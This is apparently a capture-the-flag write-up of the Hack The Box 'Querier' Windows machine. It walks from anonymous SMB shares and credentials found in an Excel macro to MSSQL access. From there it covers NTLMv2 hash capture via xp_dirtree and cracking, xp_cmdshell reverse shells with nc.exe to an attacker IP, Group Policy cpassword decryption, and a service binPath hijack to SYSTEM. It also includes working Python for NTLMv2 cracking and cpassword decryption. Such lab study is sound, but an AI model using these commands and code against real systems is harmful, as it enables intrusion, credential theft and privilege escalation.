Querier Writeup
06 May 2023 #CTF #HTB #box #medium #windowsEnumeration
nmap
$ sudo nmap -sC -sV 10.10.10.125
[...]
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-05-06T15:18:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-06T15:04:38
| Not valid after: 2053-05-06T15:04:38
| MD5: 78b041938cf45306d13a118c01f8e0fd
|_SHA-1: 0891cf4987dddbfd7f07211707db9c7da051a800
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-05-06T15:18:18
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
[...]
SMB
Let's see if we can list shares anonymously:
$ smbclient -NL 10.10.10.125
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
There is this 'Reports' share which is not default:
$ smbclient -N //10.10.10.125/Reports
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 29 00:23:48 2019
.. D 0 Tue Jan 29 00:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
smb: \> get "Currency Volume Report.xlsm"
There is only one file here, a Microsoft Excel workbook. The .xlsm extension is the macro-enabled workbook format, so it most likely contains VBA worth reading.
Macro Analysis
We can run exiftool to confirm that this is indeed a macro-enabled document:
$ exiftool 'Currency Volume Report.xlsm'
[...]
MIME Type : application/vnd.ms-excel.sheet.macroEnabled.12
Creator : Luis
Last Modified By : Luis
[...]
We also get a potential username.
We'll use olevba from oletools to extract the macros from this document:
$ olevba 'Currency Volume Report.xlsm'
[...]
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
[...]
There is a database connection string in this macro with credentials used to access the MSSQL database we saw was open on port 1433.
MSSQL
Let's use impacket's mssqlclient to access the DB:
$ impacket-mssqlclient -windows-auth 'reporting:PcwTWTHRwryjc$c6@QUERIER'
The -windows-auth flag makes mssqlclient authenticate over NTLM as a Windows account instead of as a SQL Server login; reporting is a Windows account, not a DB-only one, so the login fails without it.
Let's take a look at the databases we have access to:
SQL> select name from sys.databases
name
-----------------------------------------------------------
master
tempdb
model
msdb
volume
Only this volume database is non-default. Let's see if it has any tables:
SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> select table_name from information_schema.tables
table_name
-----------------------------------------------------------
Looks like it's completely empty.
We should also check whether our login holds the sysadmin server role, which is what we would need to run OS commands through xp_cmdshell:
SQL> select IS_SRVROLEMEMBER('sysadmin')
-----------
0
But we are not.
Foothold
Steal Hash
Another option is to force the SQL Server service account to authenticate to our box over SMB, capture the NTLMv2 challenge-response and crack it offline. We'll use responder to catch it:
$ sudo responder -I tun0
[...]
Now call the xp_dirtree stored procedure (executable by any login by default, no sysadmin needed) to list a directory on our fake share:
SQL> xp_dirtree '\\10.10.14.8\asdf\asdf'
The share name and file name don't matter; the point is that the server connects out to us and authenticates as its service account.
We see the challenge response instantly in responder:
[SMB] NTLMv2-SSP Client : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:41586128dc6fe[...]
Copy this to a file and throw it to hashcat (this is NetNTLMv2, hashcat mode 5600, which recent versions autodetect):
$ hashcat hash.txt /usr/share/wordlists/rockyou.txt
[...]
MSSQL-SVC::QUERIER:41586128dc6fe487:[...]:corporate568
[...]
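What responder caught and hashcat cracked is a NetNTLMv2 challenge-response: the server (here our fake share) sends an 8-byte challenge, the client answers with HMAC-MD5 values keyed by the account's NT hash, and anyone holding both sides of the exchange can test passwords offline. The block below is an added example, not code from this writeup, Responder or hashcat: it implements the MD4 and NTLMv2 math and checks candidate passwords against a hashcat 5600-format line. The server challenge 41586128dc6fe487 and the password corporate568 are the ones above; the client blob, nonce and timestamp are constructed, since the full hash is not reproduced on this page.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """MD4 (RFC 1320) in pure Python; hashlib's md4 is disabled in many OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1, F = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + f + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                   # round 2, G = majority(b, c, d)
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                   # round 3, H = b ^ c ^ d
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password, user, domain):
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) || domain); the domain keeps its case (MS-NLMP 3.3.2)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof_str(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || NTLMv2 client blob); this is what hashcat cracks."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def check_candidate(hashcat_line, password):
    """True if password reproduces the NTProofStr of a hashcat -m 5600 line (user::domain:chal:proof:blob)."""
    user, _, domain, chal, proof, blob = hashcat_line.split(":", 5)
    calc = nt_proof_str(password, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(calc.hex(), proof.lower())


def crack(hashcat_line, wordlist):
    """Return the first password in wordlist that matches, or None."""
    return next((pw for pw in wordlist if check_candidate(hashcat_line, pw)), None)


def forge_capture(user, domain, password, server_challenge, client_nonce, timestamp=132000000000000000):
    """Build the hashcat line a Responder capture of this account would produce (constructed test data)."""
    # NTLMv2_CLIENT_CHALLENGE: RespType 1, HiRespType 1, 6 reserved bytes, FILETIME, client nonce,
    # 4 reserved bytes, then an empty AV_PAIR list (MsvAvEOL = 4 zero bytes)
    blob = b"\x01\x01" + bytes(6) + struct.pack("<Q", timestamp) + client_nonce + bytes(4) + bytes(4)
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Server challenge taken from the capture above and the password hashcat recovered; the client
# nonce and timestamp are made up, so the proof and blob differ from the real capture.
SAMPLE_LINE = forge_capture("mssql-svc", "QUERIER", "corporate568",
                            bytes.fromhex("41586128dc6fe487"), bytes.fromhex("0011223344556677"))

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack(SAMPLE_LINE, ["123456", "password", "corporate568"]))
```

Two things worth noticing in the code: the NT hash alone is enough to compute the response, so a relayed or captured NTLMv2 exchange never reveals the password itself, only a value that can be brute-forced against it; and the timestamp and client nonce live inside the blob, so a replay of a captured response fails as soon as the server issues a new challenge.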
Abuse Service Account
Let's log in again with our new account:
impacket-mssqlclient 'mssql-svc:corporate568@QUERIER' -windows-auth
Again with -windows-auth, since mssql-svc is a local Windows account.
Let's once again check the access level:
SQL> select is_srvrolemember('sysadmin')
-----------
1
This time we have sysadmin privileges (not surprising, since this is the MSSQL service account).
That means we can use xp_cmdshell to execute commands on the server, but it is disabled by default and has to be turned on first. Impacket's mssqlclient has a helper for that, which runs the sp_configure calls for 'show advanced options' and 'xp_cmdshell' followed by RECONFIGURE:
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
Now that it is enabled, we can use it:
SQL> xp_cmdshell whoami
output
----------------------------------------------------------
querier\mssql-svc
NULL
To get a reverse shell, we'll use nc.exe (you can get it from here), hosted on an SMB share served by impacket's smbserver:
$ impacket-smbserver -smb2support -username asdf -password asdf public /opt/drop
[...]
/opt/drop is the directory where I store all tools that I might want to transfer.
Let's authenticate to our share:
SQL> xp_cmdshell net use \\10.10.14.8\public /user:asdf asdf
output
--------------------------------------------------------------------------------
The command completed successfully.
NULL
Now we can execute nc.exe straight from that share:
SQL> xp_cmdshell \\10.10.14.8\public\nc.exe 10.10.14.8 443 -e cmd.exe
Privesc
Running a privesc script like winpeas gives some interesting results:
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Found C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
UserName: Administrator
NewName: [BLANK]
cPassword: MyUnclesAreMarioAndLuigi!!1!
Changed: 2019-01-28 23:12:48
Found C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
UserName: Administrator
NewName: [BLANK]
cPassword: MyUnclesAreMarioAndLuigi!!1!
Changed: 2019-01-28 23:12:48
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
UsoSvc: AllAccess, Start
winPEAS found a cached Group Policy Preferences file (Groups.xml) that sets the local Administrator password. The cpassword value in that XML is AES-256 encrypted, but Microsoft published the static key in its own documentation (they do be like that sometimes), so tools like winPEAS decrypt it on the spot. MS14-025 stopped Windows from writing new passwords this way, but files that already exist stay readable. Let's log in with it over WinRM:
$ evil-winrm -i 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
[...]
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
We can also use psexec or wmiexec, of course.
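To see what winPEAS did with that cpassword value, here is an added example (not part of the original writeup or of winPEAS) that parses a Groups.xml document and decrypts every cpassword it finds with the key Microsoft published: base64-decode (re-adding the stripped '=' padding), AES-256-CBC with a zero IV, strip the PKCS#7 padding, decode UTF-16LE. The AES decryption is written out in pure Python so the script runs without third-party packages. The embedded Groups.xml is constructed in the layout winPEAS reported above; its cpassword is the public test value from the gpp-decrypt documentation, because the ciphertext for the box's password is not reproduced on this page.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in MS-GPPREF 2.2.1.1.4 for the cpassword attribute; the IV is all zeros
GPP_AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = bytes(16)


def _xtime(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _gmul(a, b):
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _build_sbox():
    """Derive the AES S-box (field inverse followed by the affine map) instead of hard-coding 256 bytes."""
    inv = [0] + [next(b for b in range(1, 256) if _gmul(a, b) == 1) for a in range(1, 256)]
    rotl = lambda x, n: ((x << n) | (x >> (8 - n))) & 0xFF
    return [inv[a] ^ rotl(inv[a], 1) ^ rotl(inv[a], 2) ^ rotl(inv[a], 3) ^ rotl(inv[a], 4) ^ 0x63
            for a in range(256)]


SBOX = _build_sbox()
INV_SBOX = [SBOX.index(v) for v in range(256)]


def _expand_key(key):
    """AES key schedule; returns Nr+1 flat 16-byte round keys (15 for a 32-byte key)."""
    nk = len(key) // 4
    w = [list(key[i:i + 4]) for i in range(0, len(key), 4)]
    rcon = 1
    for i in range(nk, 4 * (nk + 7)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[v] for v in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:               # extra SubWord step specific to AES-256
            t = [SBOX[v] for v in t]
        w.append([w[i - nk][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nk + 7)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out


def _decrypt_block(block, rks):
    # state is column-major: index 4*col + row, which is the order the bytes arrive in
    s = [v ^ k for v, k in zip(block, rks[-1])]
    for rnd in range(len(rks) - 2, -1, -1):
        s = [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]  # InvShiftRows
        s = [INV_SBOX[v] for v in s]                                          # InvSubBytes
        s = [v ^ k for v, k in zip(s, rks[rnd])]                              # AddRoundKey
        if rnd:                                                               # no InvMixColumns in the last round
            s = _inv_mix_columns(s)
    return bytes(s)


def decrypt_cpassword(cpassword):
    """Decrypt one cpassword value: base64 (padding usually stripped) -> AES-256-CBC -> UTF-16LE."""
    ct = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    rks, prev, pt = _expand_key(GPP_AES_KEY), GPP_IV, b""
    for i in range(0, len(ct), 16):
        pt += bytes(x ^ y for x, y in zip(_decrypt_block(ct[i:i + 16], rks), prev))
        prev = ct[i:i + 16]
    return pt[:-pt[-1]].decode("utf-16-le")       # strip PKCS#7 padding, then decode


def find_gpp_credentials(groups_xml):
    """Return (userName, cleartext) for every Properties element carrying a cpassword."""
    root = ET.fromstring(groups_xml)
    return [(p.get("userName"), decrypt_cpassword(p.get("cpassword")))
            for p in root.iter("Properties") if p.get("cpassword")]


# Constructed Groups.xml in the layout winPEAS parsed above; the cpassword is the public
# test value from the gpp-decrypt documentation, not the ciphertext from the box.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="Administrator" changed="2019-01-28 23:12:48">
    <Properties action="U" newName="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator"/>
  </User>
</Groups>"""
```

The same routine applies to any Preferences XML that carries a cpassword attribute (ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml), and to copies in SYSVOL as well as the local Group Policy\History cache winPEAS searched here; the key is the same everywhere because it is baked into the Windows client, not into the domain.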
Interestingly, my crackmapexec
(version 5.4.0 from Kali repos) didn't work with these creds:
$ crackmapexec winrm 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB 10.10.10.125 5985 QUERIER [*] Windows 10.0 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
HTTP 10.10.10.125 5985 QUERIER [*] http://10.10.10.125:5985/wsman
WINRM 10.10.10.125 5985 QUERIER [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1!
$ crackmapexec smb 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1! STATUS_NO_LOGON_SERVERS
Not sure why.
We also have full access to the UsoSvc service:
C:\>sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
It runs as LocalSystem, and winPEAS showed that we have AllAccess on it, so we can change its binary path to run nc.exe and restart the service; the service control manager then launches our command as SYSTEM. nc.exe is not a real service executable and never reports back to the service control manager, so the start will eventually fail with a timeout error, but by then the payload has already run.
C:\>copy \\10.10.14.8\public\nc.exe C:\ProgramData\nc.exe
C:\>sc.exe config UsoSvc binPath= "cmd.exe /c C:\ProgramData\nc.exe 10.10.14.8 1337 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
C:\>sc.exe stop UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530
C:\>sc.exe start UsoSvc
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
I couldn't find a way to make it execute nc.exe
from our SMB share so I had to copy it to the box.
We get our shell right away:
C:\Windows\system32>whoami
nt authority\system
It's always a good idea to restore the service to its original state after exploiting it (the original binPath, C:\Windows\system32\svchost.exe -k netsvcs -p, is in the sc qc output above).
Key Takeaways
- Use olevba to extract macros from Office documents
- Always try to steal the hash of the DB service account
- Don't trust only 1 tool